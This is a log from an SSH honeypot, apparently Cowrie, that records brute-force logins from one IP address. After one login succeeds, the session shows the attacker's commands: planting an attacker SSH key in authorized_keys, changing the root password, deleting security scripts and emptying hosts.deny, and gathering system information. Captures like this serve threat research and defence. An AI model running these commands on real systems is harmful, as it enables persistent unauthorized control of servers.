{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:02:14.511899Z","src_ip":"212.227.235.229","session":"34c3695babf2"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:02:14.518879Z","src_ip":"212.227.235.229","session":"14cc777179c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35438,"dst_ip":"1.2.3.4","dst_port":22,"session":"a85becaac798","protocol":"ssh","message":"New connection: 212.227.235.229:35438 (1.2.3.4:22) [session: a85becaac798]","sensor":"my-vps","timestamp":"2025-08-26T19:03:13.267068Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:03:13.276605Z","src_ip":"212.227.235.229","session":"a85becaac798"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:03:13.530051Z","src_ip":"212.227.235.229","session":"a85becaac798"}
{"eventid":"cowrie.login.failed","username":"musa","password":"musa","message":"login attempt [musa/musa] failed","sensor":"my-vps","timestamp":"2025-08-26T19:03:14.561886Z","src_ip":"212.227.235.229","session":"a85becaac798"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:03:15.822864Z","src_ip":"212.227.235.229","session":"a85becaac798"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38591,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec0baee5cc38","protocol":"ssh","message":"New connection: 212.227.235.229:38591 (1.2.3.4:22) [session: ec0baee5cc38]","sensor":"my-vps","timestamp":"2025-08-26T19:03:40.787565Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.7.4","message":"Remote SSH version: SSH-2.0-libssh_0.7.4","sensor":"my-vps","timestamp":"2025-08-26T19:03:40.795471Z","src_ip":"212.227.235.229","session":"ec0baee5cc38"}
{"eventid":"cowrie.client.kex","hassh":"e37f354a101aff5871ba233aa82b84ec","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss"],"encCS":["aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: e37f354a101aff5871ba233aa82b84ec","sensor":"my-vps","timestamp":"2025-08-26T19:03:41.792290Z","src_ip":"212.227.235.229","session":"ec0baee5cc38"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:03:49.193458Z","src_ip":"212.227.235.229","session":"ec0baee5cc38"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56348,"dst_ip":"1.2.3.4","dst_port":22,"session":"e49228f3ef71","protocol":"ssh","message":"New connection: 212.227.235.229:56348 (1.2.3.4:22) [session: e49228f3ef71]","sensor":"my-vps","timestamp":"2025-08-26T19:04:05.156605Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:04:05.157588Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:04:05.395242Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.login.success","username":"root","password":"333333","message":"login attempt [root/333333] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:04:06.378327Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:04:06.912483Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:04:06.913236Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:04:06.914474Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:04:07.150566Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:04:07.641075Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T19:04:07.641734Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T19:04:07.879043Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:04:07.880065Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56352,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1ad09beba9a","protocol":"ssh","message":"New connection: 212.227.235.229:56352 (1.2.3.4:22) [session: d1ad09beba9a]","sensor":"my-vps","timestamp":"2025-08-26T19:04:08.114993Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:04:08.116533Z","src_ip":"212.227.235.229","session":"d1ad09beba9a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:04:08.351028Z","src_ip":"212.227.235.229","session":"d1ad09beba9a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T19:04:09.293127Z","src_ip":"212.227.235.229","session":"d1ad09beba9a"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:04:10.530371Z","src_ip":"212.227.235.229","session":"d1ad09beba9a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:04:16.827009Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T19:04:16.827751Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:04:17.065379Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:04:17.598086Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.command.input","input":"echo \"root:ZN2JeAsfjapT\"|chpasswd|bash","message":"CMD: echo \"root:ZN2JeAsfjapT\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-08-26T19:04:17.598947Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c9489bb5b67b732e69a638d63d607df2e4b1bb1cc42fa6f5c6938fc94cc07bde","size":21,"shasum":"c9489bb5b67b732e69a638d63d607df2e4b1bb1cc42fa6f5c6938fc94cc07bde","duplicate":false,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c9489bb5b67b732e69a638d63d607df2e4b1bb1cc42fa6f5c6938fc94cc07bde after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:04:17.835251Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:04:18.366920Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-08-26T19:04:18.367658Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-08-26T19:04:18.605583Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:04:18.606496Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:04:19.174233Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-08-26T19:04:19.175043Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:04:19.413440Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:04:19.903556Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-08-26T19:04:19.904381Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":29,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:04:20.141006Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:04:20.716906Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-08-26T19:04:20.717861Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-08-26T19:04:20.718698Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:04:20.957260Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:04:21.510373Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-08-26T19:04:21.510877Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:04:21.747412Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:04:22.238269Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-08-26T19:04:22.239006Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":205,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:04:22.475976Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48135,"dst_ip":"1.2.3.4","dst_port":22,"session":"4eb218cca8c0","protocol":"ssh","message":"New connection: 212.227.235.229:48135 (1.2.3.4:22) [session: 4eb218cca8c0]","sensor":"my-vps","timestamp":"2025-08-26T19:04:22.835721Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:04:22.837744Z","src_ip":"212.227.235.229","session":"4eb218cca8c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:04:23.052132Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-08-26T19:04:23.052903Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:04:23.087862Z","src_ip":"212.227.235.229","session":"4eb218cca8c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:04:23.290217Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:04:23.780318Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T19:04:23.781155Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59127,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9b3ec4cbd8b","protocol":"ssh","message":"New connection: 212.227.235.229:59127 (1.2.3.4:22) [session: e9b3ec4cbd8b]","sensor":"my-vps","timestamp":"2025-08-26T19:04:23.783646Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:04:23.784583Z","src_ip":"212.227.235.229","session":"e9b3ec4cbd8b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:04:24.018182Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.login.failed","username":"web","password":"123456","message":"login attempt [web/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T19:04:24.085539Z","src_ip":"212.227.235.229","session":"4eb218cca8c0"}
